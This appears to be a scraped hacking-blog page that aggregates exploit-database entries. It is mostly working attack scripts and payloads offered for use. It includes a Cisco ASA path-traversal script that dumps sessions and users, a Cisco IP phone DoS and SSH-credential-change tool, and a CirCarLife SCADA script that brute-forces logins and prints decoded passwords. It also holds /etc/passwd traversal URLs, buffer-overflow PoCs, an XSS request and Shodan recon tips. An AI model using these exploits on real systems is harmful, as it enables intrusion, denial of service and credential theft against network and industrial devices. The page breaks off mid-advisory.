'''
Cisco Adaptive Security Appliance - Path Traversal (CVE-2018-0296)
A security vulnerability in Cisco ASA that would allow an attacker to view sensitive system information without authentication by using directory traversal techniques.
Vulnerable Products
This vulnerability affects Cisco ASA Software and Cisco Firepower Threat Defense (FTD) Software that is running on the following Cisco products:
3000 Series Industrial Security Appliance (ISA)
ASA 1000V Cloud Firewall
ASA 5500 Series Adaptive Security Appliances
ASA 5500-X Series Next-Generation Firewalls
ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers
Adaptive Security Virtual Appliance (ASAv)
Firepower 2100 Series Security Appliance
Firepower 4100 Series Security Appliance
Firepower 9300 ASA Security Module
FTD Virtual (FTDv)
Script usage
Installation: git clone https://github.com/yassineaboukir/CVE-2018-0296.git
Usage: python cisco_asa.py <URL>
If the web server is vulnerable, the script will dump in a text file both the content of the current directory, files in +CSCOE+ and active sessions.
Disclaimer: please note that due to the nature of the vulnerability disclosed to Cisco, this exploit could result in a DoS so test at your own risk.
Bug Bounty Recon
You can use Shodan, Censys or any other OSINT tools to enumerate vulnerable servers or simply google dork /+CSCOE+/logon.html. Figure it out :)
References:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180606-asaftd
'''
#!/usr/bin/env python
import requests
import sys
import urlparse
import os
import re
print("""
_____ _____ _____ _____ _____ ___ _____ ___
/ __ \_ _/ ___/ __ \ _ | / _ \ / ___|/ _ \
| / \/ | | \ `--.| / \/ | | | / /_\ \\ `--./ /_\ \
| | | | `--. \ | | | | | | _ | `--. \ _ |
| \__/\_| |_/\__/ / \__/\ \_/ / | | | |/\__/ / | | |
\____/\___/\____/ \____/\___/ \_| |_/\____/\_| |_/
______ _ _ _____ _
| ___ \ | | | | |_ _| | |
| |_/ /_ _| |_| |__ | |_ __ __ ___ _____ _ __ ___ __ _| |
| __/ _` | __| '_ \ | | '__/ _` \ \ / / _ \ '__/ __|/ _` | |
| | | (_| | |_| | | | | | | | (_| |\ V / __/ | \__ \ (_| | |
\_| \__,_|\__|_| |_| \_/_| \__,_| \_/ \___|_| |___/\__,_|_|
CVE-2018-0296
Script author: Yassine Aboukir(@yassineaboukir)
""")
requests.packages.urllib3.disable_warnings()
url = sys.argv[1]
regexSess = r"([0-9])\w+'"
regexUser = r"(user:)\w+"
dir_path = os.path.dirname(os.path.realpath(__file__))
filelist_dir = "/+CSCOU+/../+CSCOE+/files/file_list.json?path=/"
CSCOE_dir = "/+CSCOU+/../+CSCOE+/files/file_list.json?path=%2bCSCOE%2b"
active_sessions = "/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/"
logon = "/+CSCOE+/logon.html"
try:
is_cisco_asa = requests.get(urlparse.urljoin(url,logon), verify=False, allow_redirects=False)
except requests.exceptions.RequestException as e:
print(e)
sys.exit(1)
if "webvpnLang" in is_cisco_asa.cookies:
try:
filelist_r = requests.get(urlparse.urljoin(url,filelist_dir), verify=False)
CSCOE_r = requests.get(urlparse.urljoin(url,CSCOE_dir), verify=False)
active_sessions_r = requests.get(urlparse.urljoin(url,active_sessions), verify=False)
except requests.exceptions.RequestException as e:
print(e)
sys.exit(1)
if str(filelist_r.status_code) == "200":
with open(urlparse.urlparse(url).hostname+".txt", "w") as cisco_dump:
cisco_dump.write("======= Directory Index =========\n {}\n ======== +CSCEO+ Directory ========\n {}\n ======= Active sessions =========\n {}\n ======= Active Users =========\n".format(filelist_r.text, CSCOE_r.text, active_sessions_r.text))
''' Extraccion de usuarios'''
matches_sess = re.finditer(regexSess, active_sessions_r.text)
for match_sess in matches_sess:
active_users_r = requests.get(urlparse.urljoin(url,"/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/"+str(match_sess.group().strip("'"))), verify=False)
matches_user = re.finditer(regexUser, active_users_r.text)
for match_user in matches_user:
cisco_dump.write(match_user.group()+"\n")
''' Fin Extraccion de usuarios'''
print("Vulnerable! Check the text dump saved in {}".format(dir_path))
else: print("Not vulnerable!")
else:
print("This is not Cisco ASA! e.g: https://vpn.example.com/+CSCOE+/logon.html\n")
sys.exit(1)
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863131853
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Cisco 7937G 1-4-5-7 - DoS/Privilege Escalation
# Date: 2020-08-10
# Exploit Author: Cody Martin
# Vendor Homepage: https://cisco.com
# Version: <=SIP-1-4-5-7
# Tested On: SIP-1-4-5-5, SIP-1-4-5-7
#!/usr/bin/python
import sys
import getopt
import requests
import paramiko
import socket
import os
def main(argv):
target = ""
attack = ""
username = ""
password = ""
divider = "====================
==========================
="
help_text = '''
exploit.py -t/--target ip-address-of-target -a/--attack attack-type [-u/--u=
ser username -p/--password password]
%s
Example: exploit.py -t 192.168.1.200 -a 1
Example: exploit.py --target 192.168.1.200 --attack 3 --user bob --password=
villa
%s
Attack types:
1: DoS with automatic device reset
2: DoS without automatic device reset
3: Change SSH credentials of target device
''' % (divider, divider)
if len(sys.argv) == 1:
print(help_text)
sys.exit(2)
try:
opts, args = getopt.getopt(argv, "ht:a:u:p:", ["help", "target==
", "attack=", "user=", "password="])
except getopt.GetoptError:
print(help_text)
sys.exit(2)
for opt, arg in opts:
if opt == "-h":
print(help_text)
sys.exit()
elif opt in ("-t", "--target"):
target = arg
elif opt in ("-a", "--attack"):
attack = arg
elif opt in ("-u", "--user"):
username = arg
elif opt in ("-p", "--password"):
password = arg
if username != "" and password != "" and attack == "3":
print("Starting SSH attack!")
print(divider)
print("Target: ", target, "\nAttack: ", attack, "\nUser: ", usernam=
e, "\nPassword: ", password)
finished = attack_ssh(target, username, password)
elif attack == "1":
print("Starting DoS reset attack!")
print(divider)
print("Target: ", target, "\nAttack: ", attack)
finished = dos_one(target)
elif attack == "2":
print("Starting DoS non-reset attack!")
print(divider)
print("Target: ", target, "\nAttack: ", attack)
finished = dos_two(target)
print(divider)
if finished == 1:
print("DoS reset attack completed!")
elif finished == 2:
print("DoS non-reset attack completed!")
print("Device must be power cycled to restore functionality.")
elif finished == 3:
tell = "SSH attack finished!\nTry to login using the supplied cre=
dentials %s:%s" % (username, password)
connection_example = "ssh -oKexAlgorithms=+diffie-hellman-group=
1-sha1 %s@%s" % (username, target)
print(tell)
print("You must specify the key exchange when connecting or the dev=
ice will be DoS'd!")
print(connection_example)
elif finished == 0:
print("Something strange happened. Attack likely unsuccessful.")
sys.exit()
def dos_one(target):
url = "http://%s/localmenus.cgi" % target
data = "A"*46
payload = {"func": "609", "data": data, "rphl": "1"}
print("FIRING ZE MIZZLES!")
for i in range(1000):
try:
r = requests.post(url=url, params=payload, timeout=5)
if r.status_code != 200:
print("Device doesn't appear to be functioning or web acces=
s is not enabled.")
sys.exit()
except requests.exceptions.RequestException:
return 1
return 0
def dos_two(target):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(15)
try:
sock.connect((target, 22))
except OSError:
print("Device doesn't appear to be functioning (already DoS'd?) or =
SSH is not enabled.")
sys.exit()
transport = paramiko.Transport(sock=sock, disabled_algorithms={"k=
ex": ["diffie-hellman-group-exchange-sha1",
=
"diffie-hellman-group14-sha1",
=
"diffie-hellman-group1-sha1"]})
fd = os.open("/dev/null", os.O_WRONLY)
savefd = os.dup(2)
os.dup2(fd, 2)
try:
transport.connect(username="notreal", password="notreal")
except (paramiko.ssh_exception.SSHException, OSError, paramiko.SSHExcep=
tion):
os.dup2(savefd, 2)
return 2
return 0
def attack_ssh(target, username, password):
url = "http://%s/localmenus.cgi" % target
payload_user = {"func": "403", "set": "401", "name1": username, "name=
2": username}
payload_pass = {"func": "403", "set": "402", "pwd1": password, "pwd2"=
: password}
print("FIRING ZE MIZZLES!")
try:
r = requests.post(url=url, params=payload_user, timeout=5)
if r.status_code != 200:
print("Device doesn't appear to be functioning or web access is=
not enabled.")
sys.exit()
r = requests.post(url=url, params=payload_pass, timeout=5)
if r.status_code != 200:
print("Device doesn't appear to be functioning or web access is=
not enabled.")
sys.exit()
except requests.exceptions.RequestException:
print("Device doesn't appear to be functioning or web access is not=
enabled.")
sys.exit()
return 3
if __name__ == "__main__":
main(sys.argv[1:])
source: https://www.securityfocus.com/bid/50372/info
Multiple Cisco products are prone to a directory-traversal vulnerability.
Exploiting this issue will allow an attacker to read arbitrary files from locations outside of the application's current directory. This could help the attacker launch further attacks.
This issue is tracked by Cisco BugID CSCts44049 and CSCth09343.
The following products are affected:
Cisco Unified IP Interactive Voice Response
Cisco Unified Contact Center Express
Cisco Unified Communications Manager
http://www.example.com/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd
http://www.example.com/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../usr/local/platform/conf/platformConfig.xml
#!/usr/bin/python
# Exploit Title : CIScanv1.00 Hostname/IP Field SEH Overwrite POC
# Discovery by : Nipun Jaswal
# Email : mail@nipunjaswal.info
# Discovery Date : 11/05/2016
# Software Link : http://www.mcafee.com/us/downloads/free-tools/ciscan.aspx
# Tested Version : 1.00
# Vulnerability Type: SEH Overwrite POC
# Tested on OS : Windows 7 Home Basic
# Steps to Reproduce: Copy contents of evil.txt file and paste in the Hostname/IP Field. Press ->
##########################################################################################
# -----------------------------------NOTES----------------------------------------------#
##########################################################################################
#SEH chain of main thread
#Address SE handler
#0012FA98 43434343
#42424242 *** CORRUPT ENTRY ***
# Offset to the SEH Frame is 536
buffer = "A"*536
# Address of the Next SEH Frame
nseh = "B"*4
# Address to the Handler Code, Generally P/P/R Address
seh = "C" *4
f = open("evil.txt", "wb")
f.write(buffer+nseh+seh)
f.close()
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Exploit Title : CIScanv1.00 Hostname/IP Field Local BoF PoC
# Discovery by : Irving Aguilar
# Email : im.aguilar@protonmail.ch
# Discovery Date : 05.05.2016
# Software Link : http://www.mcafee.com/us/downloads/free-tools/ciscan.aspx#
# Tested Version : 1.00
# Vulnerability Type : Denial of Service (DoS) Local
# Tested on OS : Windows 7 Enterprise SP1 x64 en
#
#
# Steps to Produce the Crash:
# 1.- Run python code : python CIScanv1-BoF.py
# 2.- Open CIScanv1-BoF.txt and copy content to clipboard
# 3.- Open CIScan.exe
# 4.- Clic button Ok
# 5.- Paste Clipboard Scan > Hostname/IP
# 6.- Clic on add button (->)
# 7.- Clic button Aceptar
# 8.- Crashed
buffer = "\x41" * 388
eip = "\x42" * 4
f = open ("CIScanv1-BoF.txt", "w")
f.write(buffer + eip)
f.close()
source: https://www.securityfocus.com/bid/67442/info
CIS Manager is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/autenticar/lembrarlogin.asp?email=[SQL Injection]
# Exploit Title: CirCarLife SCADA 4.3.0 - Credential Disclosure
# Date: 2018-09-10
# Exploit Author: David Castro
# Vendor Homepage: https://circontrol.com/
# Shodan Dork: Server: CirCarLife Server: PsiOcppApp
# Version: CirCarLife Scada all versions under 4.3.0 OCPP implementation all versions under 1.5.0
# CVE : CVE-2018-12634
'''
Description: Mutiple information disclosure issues, including admin credentials disclosure
'''
import requests
from requests.auth import HTTPDigestAuth
from termcolor import colored
from bs4 import BeautifulSoup
import xml.etree.ElementTree as ET
import re
import json
import base64
cabecera = '''
_.-="_- _
_.-=" _- | ||"""""""---._______ __..
___.===""""-.______-,,,,,,,,,,,,`-''----" """"" """"" __'
__.--"" __ ,' CIR-PWN-LIFE o \ __ [__|
__-""=======.--"" ""--.=================================.--"" ""--.=======:
] [w] : / \ : |========================| : / \ : [w] :
V___________:| SadFud75 |: |========================| :| |: _-"
V__________: \ / :_|=======================/_____: \ / :__-"
-----------' "-____-" `-------------------------------' "-____-"
'''
print colored(cabecera, 'white')
print colored('[*] POC for automated exploitation for CirControl SCADA systems (circarlife and OCPP (Open Charge Point Protocol))', 'blue')
print colored('[?] Vendor site: https://circontrol.com/', 'yellow')
print colored('[*] CVEs associated: ', 'blue')
print colored('CVE-2018-12634, CVE-2018-16668, CVE-2018-16669, CVE-2018-16670, CVE-2018-16671, CVE-2018-16672', 'yellow')
print colored('[*] CirCarLife Scada versions affected: ', 'blue')
print colored('[+] All versions are vulnerable. No patch available, last version 4.3.0 (09/09/2018)', 'green')
print colored('[*] PsiOcppApp (PowerStudio integration Open Charge Point Protocol Application) versions affected: ', 'blue')
print colored('[+] All versions are vulnerable. No patch available, last version 1.5.0 (09/09/2018)', 'green')
print colored('[*] Shodan dorks: ', 'blue')
print colored('[+] Server: CirCarLife', 'green')
print colored('[+] Server: PsiOcppApp', 'green')
print colored('[?] More vulnerability POCs at https://github.com/SadFud/Exploits', 'yellow')
plcs = []
logutil = ['GPRS modem details']
autenticado = False
arr_versionessoft = []
arr_ldevstat = []
str_repository = ''
str_lversioneshard = ''
arr_logdetails = []
str_lsetup = ''
str_lconfig = ''
def lversionessoft():
print colored('[*] Getting software versions via CVE-2018-16671', 'blue')
leakv = requests.get(target1 + '/html/device-id')
versiones = leakv.text.encode("utf8").split('\n')
print colored('[+] Software versions collected succesfully', 'green')
return versiones
def ldevstat():
print colored('[*] Getting plc status via CVE-2018-16670', 'blue')
leakstats = requests.get(target1 + '/services/user/values.xml?var=STATUS')
statsraw = leakstats.text
tree = ET.fromstring(statsraw)
for i in range(0,len(tree.findall(".//variable"))):
for j in range(0,2):
plcs.append(tree[i][j].text)
print colored('[+] information leaked from ' + str(len(plcs)/2) + ' plcs', 'green')
return plcs
def plcstatus(code):
code = int(code)
if code == 1:
print colored('[+] OK', 'green')
elif code == 2:
if code == 0x10:
if code == 0x20:
print colored('[-] Error: Time out.', 'red')
elif code == 0x40:
print colored('[-] Error: Bad device.', 'red')
elif code == 0x80:
print colored('[-] Error: Bad phase.', 'red')
elif code == 0x100:
print colored('[-] Error: Bad version.', 'red')
else:
print colored('[-] Error: Unknown error.', 'red')
elif code == 4:
print colored('[-] Error: not initialized.', 'red')
else:
print colored('[?] Unknown code.', 'yellow')
def repository():
print colored('[*] Getting installation paths via CVE-2018-16668', 'blue')
path = requests.get(target1 + '/html/repository')
rutas = path.text.encode("utf8").split('\n')
platformpath = rutas[1].split(' ')
platformpath = platformpath[0]
appsrc = rutas[3]
appsrc = rutas[3].split(' ')
appsrc = appsrc[0]
raiz = str(appsrc).find('/circarlife/')
appsrc = appsrc[0:raiz+len('/circarlife/')]
print colored('[+] Platform installation path retrieved succesfully', 'green')
return 'Platform installation path: ' + platformpath + '\n[+] Applicaction installation path: ' + appsrc
def lversioneshard():
print colored('[*] Getting powerstudio driver versions via CVE-2018-12634', 'blue')
basura = ['/li', '<', 'body', 'html', '>', '/ul', '/']
hardleak = requests.get(target1 + '/services/system/info.html')
hardleak = hardleak.text.encode("utf8").replace('<br />', '\n')
hardleak = hardleak.replace('<li>', '\n')
for caca in basura:
hardleak = hardleak.replace(caca, '')
print colored('[+] Powerstudio driver versions leaked succesfully', 'green')
return hardleak
def logdetails():
print colored('[*] Leaking sensitive information via CVE-2018-12634', 'blue')
log = requests.get(target1 + '/html/log')
log = log.text.encode("utf8")
print colored('[*] Searching for modem id', 'blue')
posmid = log.rfind('/modem-start: modem id: ')
logarr = log.split('\n')
if posmid != -1:
logutil.append('Modem model:')
print colored('[*] Modem id located', 'blue')
for linea in logarr:
if '/modem-start: modem id: ' in linea:
print colored('[+] Modem id leaked', 'green')
linea = linea.split(' ')
logutil.append(linea[9])
else:
print colored('[-] Modem id not found', 'red')
print colored('[*] Searching for GPRS modem credentials', 'blue')
poslogin = log.rfind('Greetings!!')
if poslogin != -1:
print colored('[*] Credentials found', 'blue')
logutil.append('Modem credentials')
print colored('[+] GPRS modem credentials retrieved', 'green')
for linea in logarr:
if 'password=\"' in linea:
linea = linea.split(' ')
logutil.append(linea[11])
logutil.append(linea[12])
else:
print colored('[-] GPRS modem credentials not found with CVE-2018-12634', 'red')
return logutil
def lsetup(user, pwd):
print colored('[*] Exploiting CVE-2018-16672 to leak information', 'blue')
r1 = requests.get(target1 + '/services/system/setup.json', auth=HTTPDigestAuth(user, pwd))
if r1.text.encode("utf8").find('not granted') != -1:
print colored('[-] Error, login failed', 'red')
else:
respuesta = r1.text.encode("utf8")
print colored('[+] Setup information leaked')
return respuesta
def lbrute():
global luser80
global lpasswd80
global luser8080
global lpasswd8080
dicc = raw_input('Enter dictionary file with extension[format[user:password]]: ')
listado = open(dicc, "r")
data = listado.readlines()
print colored('[*] Starting bruteforce...', 'blue')
for linea in data:
linea = linea.split(':')
user = linea[0]
pwd = linea[1]
r1 = requests.get(target1 + '/services/system/setup.json', auth=HTTPDigestAuth(user.strip(), pwd.strip()))
r2 = requests.get(target2 + '/services/config/config.xml', auth=HTTPDigestAuth(user.strip(), pwd.strip()))
if r1.text.encode("utf8").find('not granted') != -1:
print colored('[-] Error, login failed on port 80 with ' + user + ':' + pwd, 'red')
else:
print colored('[+] Valid credentials found on port 80: ' + user + ':' + pwd, 'green')
luser80 = user
lpasswd80 = pwd
if r2.text.encode("utf8").find('Acess not granted') != -1:
print colored('[-] Error, login failed on port 8080 with ' + user + ':' + pwd, 'red')
else:
print colored('[+] Valid credentials found on port 8080: ' + user + ':' + pwd, 'green')
luser8080 = user
lpasswd8080 = pwd
listado.close()
def lconfig(user, pwd):
print colored('[*] Leaking config file via CVE-2018-16669', 'blue')
r2 = requests.get(target2 + '/services/config/config.xml', auth=HTTPDigestAuth(user.strip(), pwd.strip()))
if r2.text.encode("utf8").find('Acess not granted') != -1:
print colored('[-] Error. Login failed', 'red')
else:
config = r2.text.encode('utf8')
print colored('[+] Config file leaked succesfully', 'green')
return config
def salida(versiones, plcs, ruta, hard, log, setup, config):
print colored('[*] Parsing information and generating output.', 'blue')
print colored('[*] Parsing software information', 'blue')
print colored('[+] Device name: ', 'green') + versiones[0]
print colored('[+] Software_name: ', 'green') + versiones[1]
print colored('[+] Software_version: ', 'green') + versiones[2]
print colored('[+] System time: ', 'green') + versiones[3]
print colored('[+] ', 'green') + ruta
print colored('[*] Parsing powerstudio driver versions', 'blue')
hard = hard.replace('ul', '')
print colored(hard.strip(), 'green')
print colored('[*] Parsing PLCs values', 'blue')
for i in range(0,len(plcs)):
if ((i % 2) != 0):
codigo = plcs[i].split('.')
plcstatus(codigo[0])
else:
nombre = plcs[i].replace('.STATUS', '')
print colored('[+] PLC name: ' + nombre, 'green')
print colored('[*] Parsing leaked data from logs using CVE-2018-12634', 'blue')
if len(log) > 3:
print colored('[*] ' + log[0], 'blue')
for i in range(2,len(log)):
if log[i] != 'Modem credentials':
print colored('[+] GPRS router model found: ', 'green') + log[i]
break
for i in range(0,len(log)):
if log[i] == 'Modem credentials':
creds = i
break
for i in range(creds + 1, len(log)):
if (log[i].rfind('user=')) != -1:
usuario = log[i].split('=')
user = usuario[1]
user = user.replace('\"', '')
if (log[i].rfind('password=')) != -1:
cont = log[i].split('=')
contrase = cont[1]
contrase = contrase.replace('\"', '')
contrase = contrase.replace(']', '')
break
print colored('[+] Username and password for GPRS modem found: ', 'green') + user + ':' + contrase
else:
colored('[?] No data was extracted from logs using CVE-2018-12634', 'yellow')
print colored('[*] Parsing setup file', 'blue')
if (len(str(setup)) > 5):
datos = json.loads(setup)
print colored('[*] Processing device configuration data: ', 'blue')
print colored('[+] MAC Address: ', 'green') + datos["device"]["mac"]
print colored('[+] IMEI: ', 'green') + datos["device"]["imei"]
print colored('[+] ICCID: ', 'green') + datos["device"]["iccid"]
print colored('[+] IMSI: ', 'green') + datos["device"]["imsi"]
print colored('[*] Processing network configuration data: ', 'blue')
print colored('[+] Hostname: ', 'green') + datos["network"]["hostname"]
print colored('[+] ClientId: ', 'green') + datos["network"]["clientid"]
print colored('[+] IP address: ', 'green') + datos["network"]["ip"]
print colored('[+] Netmask: ', 'green') + datos["network"]["netmask"]
print colored('[+] Gateway: ', 'green') + datos["network"]["gateway"]
print colored('[+] Name server 0: ', 'green') + datos["network"]["nameserver0"]
print colored('[+] Name server 1: ', 'green') + datos["network"]["nameserver1"]
print colored('[*] Processing locale options configuration data', 'blue')
print colored('[+] Language: ', 'green') + datos["locale"]["language"]
print colored('[+] Currency: ', 'green') + datos["locale"]["currency"]
print colored('[*] Processing public address configuration data', 'blue')
print colored('[+] Host type: ', 'green') + datos["paddress"]["hosttype"]
print colored('[+] Host: ', 'green') + datos["paddress"]["host"]
print colored('[*] Processing time configuration data', 'blue')
print colored('[+] NTP Server 0: ', 'green') + datos["time"]["ntpserver0"]
print colored('[+] NTP server 1: ', 'green') + datos["time"]["ntpserver1"]
print colored('[+] Timezone: ', 'green') + datos["time"]["timezone"]
print colored('[*] Processing GPRS modem configuration data', 'blue')
print colored('[+] Acess point name: ', 'green') + datos["modem"]["apn"]
print colored('[+] Username: ', 'green') + datos["modem"]["usr"]
print colored('[+] Password: ', 'green') + datos["modem"]["pwd"]
print colored('[+] Reset: ', 'green') + str(datos["modem"]["reset"])
print colored('[+] Ping Ip: ', 'green') + str(datos["modem"]["pingip"])
print colored('[+] Ping period: ', 'green') + str(datos["modem"]["pingperiod"])
print colored('[+] Ping auto reset: ', 'green') + str(datos["modem"]["pingautoreset"])
print colored('[*] Processing DDNS configuration data', 'blue')
print colored('[+] DDNS server: ', 'green') + datos["ddns"]["server"]
print colored('[+] DDNS host: ', 'green') + datos["ddns"]["host"]
print colored('[+] DDNS Username: ', 'green') + datos["ddns"]["usr"]
print colored('[+] DDNS password: ', 'green') + datos["ddns"]["pwd"]
print colored('[*] Processing security configuration data', 'blue')
print colored('[+] Username: ', 'green') + datos["security"]["user"]
print colored('[+] Password: ', 'green') + str(datos["security"]["passwd"])
print colored('[*] Processing services configuration data', 'blue')
print colored('[+] iManager', 'green') + str(datos["services"]["imanager"])
print colored('[+] Active-Integration: ', 'green') + str(datos["services"]["activeIntegration"])
print colored('[+] Web Editor: ', 'green') + str(datos["services"]["webeditor"])
print colored('[+] SCADA Applet: ', 'green') + str(datos["services"]["appletscada"])
print colored('[+] Html5: ', 'green') + str(datos["services"]["html5"])
print colored('[*] Parsing Open Charge Point Protocol configuration file', 'blue')
else:
print colored('[-] Unable to retrieve the setup config file', 'red')
if (len(str(config)) > 10):
tree = ET.fromstring(config)
print colored('[*] Processing management system CS settings', 'blue')
print colored('[+] End point: ', 'green') + str(tree.find('.//csEndPoint').text)
print colored('[+] Username: ', 'green') + str(tree.find('.//csUser').text)
print colored('[+] Password: ', 'green') + str(tree.find('.//csPassword').text)
print colored('[+] Litle endian: ', 'green') + str(tree.find('.//isLitleEndian').text)
print colored('[*] Processing Charge Box settings file', 'blue')
print colored('[+] Charge box Protocol: ', 'green') + str(tree.find('.//cbProtocol').text)
print colored('[+] Charge box certificate: ', 'green') + str(tree.find('.//cbRequireCsClientCertificate').text)
print colored('[+] Charge box ID: ', 'green') + str(tree.find('.//cbId').text)
print colored('[+] Charge box Username: ', 'green') + str(tree.find('.//cbUser').text)
print colored('[+] Charge box password: ', 'green') + str(tree.find('.//cbPassword').text)
print colored('[+] Charge box OCPP internal port: ', 'green') + str(tree.find('.//cbOcppPortInternal').text)
print colored('[+] Charge box OCPP public port: ', 'green') + str(tree.find('.//cbOcppPortPublic').text)
print colored('[+] Charge box use whitelist: ', 'green') + str(tree.find('.//cbUseWl').text)
print colored('[+] Charge box whitelist first: ', 'green') + str(tree.find('.//cbWlFirst').text)
print colored('[+] Charge box offline authentication: ', 'green') + str(tree.find('.//cbAuthOffline').text)
print colored('[+] Charge box internal error retry delay: ', 'green') + str(tree.find('.//cbRetryInternalErr').text)
print colored('[+] Charge box use OCPP T-Sync: ', 'green') + str(tree.find('.//cbUseOcppTSync').text)
print colored('[+] Charge box use compression: ', 'green') + str(tree.find('.//cbUseCompression').text)
print colored('[+] Charge box use aprtial energy: ', 'green') + str(tree.find('.//cbUsePartialEnergy').text)
#print colored('[+] Charge box use partial energy meter value: ', 'green') + str(tree.find('.//cbUsePartialEnergyMeterVal').text)
print colored('[+] Charge box stop if unauthenticated: ', 'green') + str(tree.find('.//cbStopIfUnauth').text)
print colored('[+] Charge box stop if concurrent tx: ', 'green') + str(tree.find('.//cbStopIfConcurrentTx').text)
print colored('[+] Charge box hearth-beat interval: ', 'green') + str(tree.find('.//cbHbInterval').text)
print colored('[+] Charge box connection time out interval: ', 'green') + str(tree.find('.//cbConnTimeOut').text)
print colored('[+] Charge box meter interval: ', 'green') + str(tree.find('.//cbMeterInterval').text)
#print colored('[+] Charge box public Ip timeout interval: ', 'green') + str(tree.find('.//cbPublicIpTimeOut').text)
#print colored('[+] Charge box authentication required for remote start: ', 'green') + str(tree.find('.//cbRequireAuthRemoteStart').text)
#print colored('[+] Charge box meter requires power: ', 'green') + str(tree.find('.//cbMeterValRequiresPower').text)
print colored('[*] Processing Powerstudio engine settings file' , 'blue')
print colored('[+] Powerstudio engine host: ', 'green') + str(tree.find('.//pwStdHost').text)
print colored('[+] Powerstudio engine port: ', 'green') + str(tree.find('.//pwStdPort').text)
print colored('[+] Powerstudio engine username: ', 'green') + str(tree.find('.//pwStdUser').text)
print colored('[+] Powerstudio engine password: ', 'green') + base64.b64decode(str(tree.find('.//pwStdPassword').text))
print colored('[+] Powerstudio engine username (with edit permissions): ', 'green') + str(tree.find('.//pwStdUserEdit').text)
print colored('[+] Powerstudio engine password (with edit permissions): ', 'green') + base64.b64decode(str(tree.find('.//pwStdPasswordEdit').text))
print colored('[*] Processing powerstudio application parameters', 'blue')
print colored('[+] Powerstudio application port: ', 'green') + str(tree.find('.//pssPort').text)
print colored('[+] Powerstudio application admin: ', 'green') + str(tree.find('.//pssAdminUser').text)
print colored('[+] Powerstudio application password: ', 'green') + base64.b64decode(str(tree.find('.//pssAdminPassword').text))
print colored('[+] Powerstudio application debug logging level: ', 'green') + str(tree.find('.//pssLoglevel').text)
else:
print colored('[-] Unable to retrieve the OCPP config file', 'red')
#entrypoint
url = raw_input('Insert target ip: ')
target1 = 'http://' + url
target2 = 'http://' + url + ':8080'
luser80 = 'admin'
lpasswd80 = '1234'
luser8080 = 'admin'
lpasswd8080 = '1234'
luser80 = raw_input('Insert username for login at circarlife server: (b to bruteforce)')
if (luser80 == 'b'):
lbrute()
else:
lpasswd80 = raw_input('Insert password for login at circarlife server: ')
luser8080 = raw_input('Insert username for login at OCPP server: ')
lpasswd8080 = raw_input('Insert password for login at OCPP server: ')
versiones = lversionessoft()
plcs = ldevstat()
ruta = repository()
hard = lversioneshard()
log = logdetails()
setup = lsetup(luser80.strip(), lpasswd80.strip())
config = lconfig(luser8080.strip(), lpasswd8080.strip())
salida(versiones, plcs, ruta, hard, log, setup, config)
# Exploit Title: Cipi Control Panel 3.1.15 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Date: 24.02.2022
# Exploit Author: Fikrat Ghuliev (Ghuliev)
# Vendor Homepage: https://cipi.sh/ <https://www.aapanel.com/>
# Software Link: https://cipi.sh/ <https://www.aapanel.com/>
# Version: 3.1.15
# Tested on: Ubuntu
When the user wants to add a new server on the "Server" panel, in "name"
parameter has not had any filtration.
POST /api/servers HTTP/1.1
Host: IP
Content-Length: 102
Accept: application/json
X-Requested-With: XMLHttpRequest
Authorization: Bearer
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Content-Type: application/json
Origin: http://IP
Referer: http://IP/servers
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
{
"name":"\"><script>alert(1337)</script>",
"ip":"10.10.10.10",
"provider":"local",
"location":"xss test"
}
Cimetrics BACstac Routing Service 6.2f Local Privilege Escalation
Vendor: Cimetrics, Inc.
Product web page: https://www.cimetrics.com
Affected version: 6.2f
Summary: BACstac belongs to product BACstac(TM) Networking Software and
was developed by company Cimetrics Inc. Cimetrics is excited to announce
a new version of our industry-leading BACnet protocol stack: BACstac 6.8.
The Cimetrics BACstac saves man-years of development when your company needs
to create a BACnet solution ! Our software team has created a set of BACnet
libraries which greatly simplify the task of interfacing to BACnet.
Even the largest companies in the HVAC industry use our code because it is
a very complex and time consuming task keeping up with the ongoing changes
that are taking place in the BACnet committees. For example, many hundreds
of protocol modifications, requirements, and enhancements have taken place
in just the past year. By purchasing the Cimetrics BACstac solution, we do
the compatibility coding and testing. This typically saves man-years of
software developer time EVERY YEAR !
Desc: The application suffers from an unquoted search path issue impacting
the service 'bacstac' (bacstac-gtw.exe) for Windows deployed as part of BACstac
routing service solution. This could potentially allow an authorized but non-privileged
local user to execute arbitrary code with elevated privileges on the system.
A successful attempt would require the local user to be able to insert their
code in the system root path undetected by the OS or other security applications
where it could potentially be executed during application startup or reboot.
If successful, the local user’s code would execute with the elevated privileges
of the application.
BACstac also provides a named pipe used for IPC connection between a BACstac
application and the BACstac service.
The BACstac Service implements AL multiplexing using a custom IPC mechanism. The
IPC mechanism was chosen to allow portability to embedded systems, and it uses a
fixed number of slots. The slots are recycled when an application stops running.
With Object-based multiplexing, Service requests that identify a particular Object
(e.g. Read-Property) can be forwarded to a dedicated process. A multiplexing server
using an appropriate IPC mechanism (e.g. CORBA, COM, or UDP) can be built on top of
the BACstac API.
A number of BACstac protocol stack run-time configuration parameters are stored
in the Windows Registry. These values are created and initialized when the protocol
stack is installed. The registry entries are not completely removed when the protocol
stack is uninstalled (this is standard behaviour for .INF files). The Registry
entries are located in:
